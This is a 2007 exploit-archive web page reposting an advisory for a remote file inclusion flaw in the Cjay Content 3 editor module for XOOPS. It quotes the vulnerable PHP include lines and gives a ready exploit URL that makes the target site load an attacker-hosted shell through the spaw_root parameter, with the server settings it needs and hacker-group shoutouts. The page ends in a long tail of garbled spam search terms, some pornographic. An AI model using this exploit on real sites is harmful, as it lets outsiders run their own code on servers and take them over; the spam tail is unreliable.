about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability




2007-06-15 XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
Rated as : Moderate Risk

##############################################################################################
#         ___   ___                         _
#        / _  / _                        | |
#   __ _| | | | | | |_ __  ___   _ __   ___| |_
#  / _` | | | | | | | '_ / __| | '_  / _  __|
# | (_| | |_| | |_| | | | __ _| | | |  __/ |_
#  __, |___/ ___/|_| |_|___(_)_| |_|___|__|
#   __/ |
#  |___/
##############################################################################################
#INFO:
#Program Title
###############################################################################
#Cjay Content 3 WYSIWYG IE 5.5+ Remote File Inclusion Vulnerability
#
#Description
#################################################################################
#Editor module for XOOPS CMS
#
#Vuln Code
###################################################################################
#In /admin/editor2/spaw_control.class.php:
# include $spaw_root.'config/spaw_control.config.php';
# include $spaw_root.'class/toolbars.class.php';
# include $spaw_root.'class/lang.class.php';
#Note: Register globals must be ON, and Magic Quotes must be OFF for this
exploit to work.
#
#Script Download
##############################################################################
#http://www.xoops.org/modules/repository/singlefile.php?cid=94&lid=1123
#
#Exploit
######################################################################################
#
#http://[ site
]/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[
shell ]?
#
#Credits
######################################################################################
#FiSh for vulnerability
#shoutz: clorox, z3r0, katalyst, SyNiCaL, sCuZz, OD, pr0be, 0ptix, str0ke
#        grumpy, and everyone else at g00ns.net
###############################################################################################
securitydot.net - 2007-06-15

Advertising

Copyright 2007, SecurityDot
Sat, 07 Nov 2009 09:12:11 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Crack Data Www.pornhu nayandara qhmy.blogb www.zncsb. Bondage qq00000000 9367165286 Www.pornhu qhmy.blogb Imaes sexy 200 /compo php chat Wwwsexcm www.tvg168 sexgirl p Video sex freesex v tamil vide youporrne WWW.SEXYWO oil prices www.bigpan www.bthyby www.yingke sex vdyo php chat Www.suckin vsFTPd 1.0 pakstani www.bthyby zjghscm.zw www.aixin. PHP Advanc Fat grils www.wapart www.zjghsc yingkeith5 how to hac total vide Girlsimage news for c www.tzzt00 www.zzttt. xt+commerc D-2 Powered b Womenssex Invision P mambo+Remo